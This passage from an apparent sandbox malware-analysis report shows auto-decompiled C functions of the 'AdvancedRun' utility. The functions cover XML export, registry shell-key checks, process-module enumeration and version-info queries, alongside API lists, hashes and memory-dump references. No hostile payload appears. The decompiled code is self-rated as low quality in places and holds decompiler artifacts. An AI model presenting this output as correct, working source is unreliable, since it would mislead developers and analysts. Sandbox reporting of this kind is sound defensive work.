					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                  0x00404fe0
                                                                  0x00404fe9
                                                                  0x00405000
                                                                  0x00405005
                                                                  0x00405009
                                                                  0x0040500c
                                                                  0x0040500e
                                                                  0x00405015
                                                                  0x00405016
                                                                  0x00405021
                                                                  0x00405026
                                                                  0x00405027
                                                                  0x0040502c
                                                                  0x00405031
                                                                  0x00405039
                                                                  0x0040503f
                                                                  0x00405044
                                                                  0x00405048
                                                                  0x0040504e
                                                                  0x00405056
                                                                  0x0040505c
                                                                  0x0040504e
                                                                  0x00405065
                                                                  0x0040506a
                                                                  0x00405072
                                                                  0x00405079

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2521778956-791839006
                                                                  • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                  • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 42%
                                                                  			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                  0x00407d9c
                                                                  0x00407d9e
                                                                  0x00407da5
                                                                  0x00407db3
                                                                  0x00407dba
                                                                  0x00407dc5
                                                                  0x00407dc7
                                                                  0x00407dd0
                                                                  0x00407dc9
                                                                  0x00407dc9
                                                                  0x00407dc9
                                                                  0x00407dd8
                                                                  0x00407de1
                                                                  0x00407de5
                                                                  0x00407deb
                                                                  0x00407df2
                                                                  0x00407df3
                                                                  0x00407dfe
                                                                  0x00407e03
                                                                  0x00407e04
                                                                  0x00407e21

                                                                  APIs
                                                                  Strings
                                                                  • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                  • <%s>, xrefs: 00407DF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                  • API String ID: 3473751417-2880344631
                                                                  • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                  • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 70%
                                                                  			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                  0x00403b56
                                                                  0x00403b5d
                                                                  0x00403b6f
                                                                  0x00403b76
                                                                  0x00403b82
                                                                  0x00403b8d
                                                                  0x00403b8e
                                                                  0x00403b99
                                                                  0x00403b9e
                                                                  0x00403b9f
                                                                  0x00403ba7
                                                                  0x00403bb9
                                                                  0x00403bce
                                                                  0x00403be5
                                                                  0x00403bef
                                                                  0x00403bf8
                                                                  0x00403c00

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00403B5D
                                                                  • memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                    • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                    • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                    • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                  • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                  • API String ID: 1832587304-479876776
                                                                  • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                  • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                  0x0040afd3
                                                                  0x0040afe2
                                                                  0x0040aff3
                                                                  0x0040b002
                                                                  0x0040b023
                                                                  0x00000000
                                                                  0x0040b047
                                                                  0x0040b02e
                                                                  0x0040b034
                                                                  0x0040b03c
                                                                  0x00000000

                                                                  APIs
                                                                  • wcscpy.MSVCRT ref: 0040AFD3
                                                                  • wcscat.MSVCRT ref: 0040AFE2
                                                                  • wcscat.MSVCRT ref: 0040AFF3
                                                                  • wcscat.MSVCRT ref: 0040B002
                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                    • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                  • String ID: \StringFileInfo\
                                                                  • API String ID: 393120378-2245444037
                                                                  • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                  • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscpy
                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                  • API String ID: 999028693-502967061
                                                                  • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                  • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 35%
                                                                  			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}
























                                                                  0x004092f3
                                                                  0x004092fb
                                                                  0x00409303
                                                                  0x00409305
                                                                  0x00409310
                                                                  0x00409439
                                                                  0x0040943f
                                                                  0x00409445
                                                                  0x0040944e
                                                                  0x00409452
                                                                  0x00409466
                                                                  0x0040946e
                                                                  0x00409475
                                                                  0x004094f7
                                                                  0x00409488
                                                                  0x00409494
                                                                  0x004094a5
                                                                  0x004094a9
                                                                  0x004094b5
                                                                  0x004094c3
                                                                  0x004094c6
                                                                  0x004094d5
                                                                  0x004094e3
                                                                  0x004094f1
                                                                  0x00000000
                                                                  0x004094f1
                                                                  0x00000000
                                                                  0x004094e3
                                                                  0x00000000
                                                                  0x004094f7
                                                                  0x00409452
                                                                  0x00409322
                                                                  0x0040932b
                                                                  0x00409333
                                                                  0x00409337
                                                                  0x00409341
                                                                  0x00409342
                                                                  0x0040934e
                                                                  0x0040934f
                                                                  0x00409358
                                                                  0x0040935e
                                                                  0x0040935e
                                                                  0x00409363
                                                                  0x0040936b
                                                                  0x0040936d
                                                                  0x00409377
                                                                  0x00409385
                                                                  0x0040938d
                                                                  0x0040939d
                                                                  0x004093a5
                                                                  0x004093ac
                                                                  0x004093b4
                                                                  0x004093c5
                                                                  0x004093c9
                                                                  0x004093da
                                                                  0x004093df
                                                                  0x004093e5
                                                                  0x004093e6
                                                                  0x004093ea
                                                                  0x004093f6
                                                                  0x004093fc
                                                                  0x00409407
                                                                  0x00409407
                                                                  0x0040941d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409423
                                                                  0x00409428
                                                                  0x00409375
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040942e
                                                                  0x00000000
                                                                  0x00409428
                                                                  0x00409377
                                                                  0x0040936d
                                                                  0x004094fb
                                                                  0x004094ff
                                                                  0x004094ff
                                                                  0x00409337
                                                                  0x0040950f

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                  • memset.MSVCRT ref: 0040938D
                                                                  • memset.MSVCRT ref: 0040939D
                                                                    • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                  • memset.MSVCRT ref: 00409488
                                                                  • wcscpy.MSVCRT ref: 004094A9
                                                                  • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                  • String ID:
                                                                  • API String ID: 3300951397-0
                                                                  • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                  • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                  • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                  • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 44%
                                                                  			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                  0x00402ed7
                                                                  0x00402eee
                                                                  0x00402ef8
                                                                  0x00402f00
                                                                  0x00402f01
                                                                  0x00402f05
                                                                  0x00402f0a
                                                                  0x00402f1a
                                                                  0x00402f30

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                  • String ID:
                                                                  • API String ID: 19018683-0
                                                                  • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                  • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                  • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                  • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 50%
                                                                  			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                  0x004079a4
                                                                  0x004079b8
                                                                  0x004079bd
                                                                  0x004079c2
                                                                  0x004079c5
                                                                  0x004079c5
                                                                  0x004079db
                                                                  0x004079f7
                                                                  0x00407a06
                                                                  0x00407a0c
                                                                  0x00407a11
                                                                  0x00407a13
                                                                  0x00407a14
                                                                  0x00407a17
                                                                  0x00407a18
                                                                  0x00407a1d
                                                                  0x00407a22
                                                                  0x00407a25
                                                                  0x00407a2a
                                                                  0x00407a35
                                                                  0x00407a3a
                                                                  0x00407a3b
                                                                  0x00407a40
                                                                  0x00407a52

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004079DB
                                                                    • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                  • _snwprintf.MSVCRT ref: 00407A25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                  • API String ID: 1775345501-2769808009
                                                                  • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                  • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                  • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                  • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                  0x00404683
                                                                  0x00404692
                                                                  0x00404699
                                                                  0x0040469b
                                                                  0x004046af
                                                                  0x004046ba
                                                                  0x004046bc
                                                                  0x004046c7
                                                                  0x004046cc
                                                                  0x004046cd
                                                                  0x004046ee
                                                                  0x004046f3
                                                                  0x004046fa
                                                                  0x004046fa
                                                                  0x004046ee
                                                                  0x00404705

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004046AF
                                                                  • _snwprintf.MSVCRT ref: 004046CD
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen_snwprintfmemset
                                                                  • String ID: %s\shell\%s
                                                                  • API String ID: 1458959524-3196117466
                                                                  • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                  • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                  • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                  • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 16%
                                                                  			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
